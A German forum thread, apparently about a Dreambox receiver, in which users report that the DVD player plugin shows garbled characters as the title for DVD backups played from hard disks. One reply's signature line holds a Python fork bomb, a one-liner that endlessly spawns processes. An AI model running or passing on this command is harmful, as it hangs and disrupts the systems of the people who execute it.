DVD-Player Plugin: Name der DVD wird nicht korrekt angezeigt

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

• DVD-Player Plugin: Name der DVD wird nicht korrekt angezeigt

folgendes gemacht:

- DVD auf HDD eingelagert.
      - mit DVD PLAYER zum Ordner navigiert der die eingelagerten Files enthält.

( Externe Festplatte mit EXT3 Filesystem [NTFS hatte das selbe Ergebniss] verlinkt via Devicemanager nach /media/usb)
      --> DVD Player startet die Wiedergabe der "DVD" einwandfrei
      Einzig der Name der "DVD" wird als Hyroglyphen angezeigt.

Im Anhang vier Screenshots:
      - Screenshot der Wiedergabe der eingelegten DVD
      - Screenshot der Wiedergabe der eingelagerten DVD von /media/hdd/dvd (interne HDD)
      - Screenshot der Wiedergabe der eingelagerten DVD von /media/usb (/autofs/sdf1 via Devicemanager nach/media/usb verlinkt)
      - Screenshot der Wiedergabe der eingelagerten DVD von /autofs/sdf1

Meine Fragen:
      - Wo kommen diese Hyroglyphen her ? Aus welcher Datei, Variablen, ... wird das ausgelesen ?
      - Kann es sein, das das auslesen eventuell im falschen Zeichensatz geschieht oder es was mit dem Unterschiedlichen Dateiformat zwischen HDD und DVD zu tun hat ?

Lösungsvorschlag:
      - Der PLAYER erkennt ja eh schon, ob er von DVD oder von HDD abspielt.
      - Wenn er von HDD abspielt, dann soll er einfach als Namen den Namen des Ordners anzeigen, in dem er die Files "gefunden" hat.
      Die Variable ist ja eh schon benutzt...

Das Problem existiert definitiv, aber wer "schuld" ist bin ich mir gerade nicht ganz sicher...
      Bilder
      • media_hdd_movie_7zwerge.jpg

32,77 kB, 720×405, 1.421 mal angesehen
      • internalflash_media_usb_7zwerge.jpg

32,77 kB, 720×405, 1.400 mal angesehen
      • autofs_sdf1_7zwerge.jpg

18,64 kB, 720×405, 1.363 mal angesehen
      • dvd_direkt.jpg

17,9 kB, 720×405, 1.386 mal angesehen
      Dateien
      • fsta.

(619 Byte, 450 mal heruntergeladen, zuletzt: )
      There´s no life without dreams... but sometimes it could be a nightmare...

Dieser Beitrag wurde bereits 6 mal editiert, zuletzt von elektronikfreak ()

• verwirrt...
      Die FSTAB ändert sich doch nicht von alleine oder ?
      Also ich habe da nix dran rum gemacht. Die ist so wie im 2.8 default.

Und die lustigen Zeichen kommen dann, wenn man den Abspielort "anders" auswählt (siehe oben)
      There´s no life without dreams... but sometimes it could be a nightmare...
    • Hallo,

hat schon jemand das Problem lösen können? Habe eine 8000, Festplatte intern 1,5 TB. Meine Filme sind unter media/hdd/movie. Ich habe das selbe Problem das die Namen der Filme in der Info Bar nicht richtig angezeigt werden.

Wäre nett wenn jemand eine Tipp hätte. Image 2.8.3

Gruß Watze
    • Also das dvd handling ist nicht so einfach wie man sich das vorstellt.
      Im plugin ordner liegt ne lib die wiederum auf lbdreamdvd0 zugreift diese geht dann zu libdvdread
      das ist ne sehr lange kette wo fehler passieren können.
      Wenn man pysikalisch den damen aus ner dvd lesen tut sieht das so aus 7_ZWERGE wenn nun nen backup abgespielt wird funzt das auslesen nimmer da wird der ordnername genommen.
      Aber wir haben da kein einfluss drauf da das ein plugin von dmm ist.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • wenn der Ordnername z.B " Der mit dem Wolf tanzt " heißt, dann sollte es doch auch so angezeigt werden? Oder nicht ? Bei mir steht nur kauderwelsch obwohl alle Ordner auf media/hdd/movie richtig benannt sind.

Kann ich also was ändern damit es richtig angezeigt wird, oder muss ich damit leben ?

Gruß Watz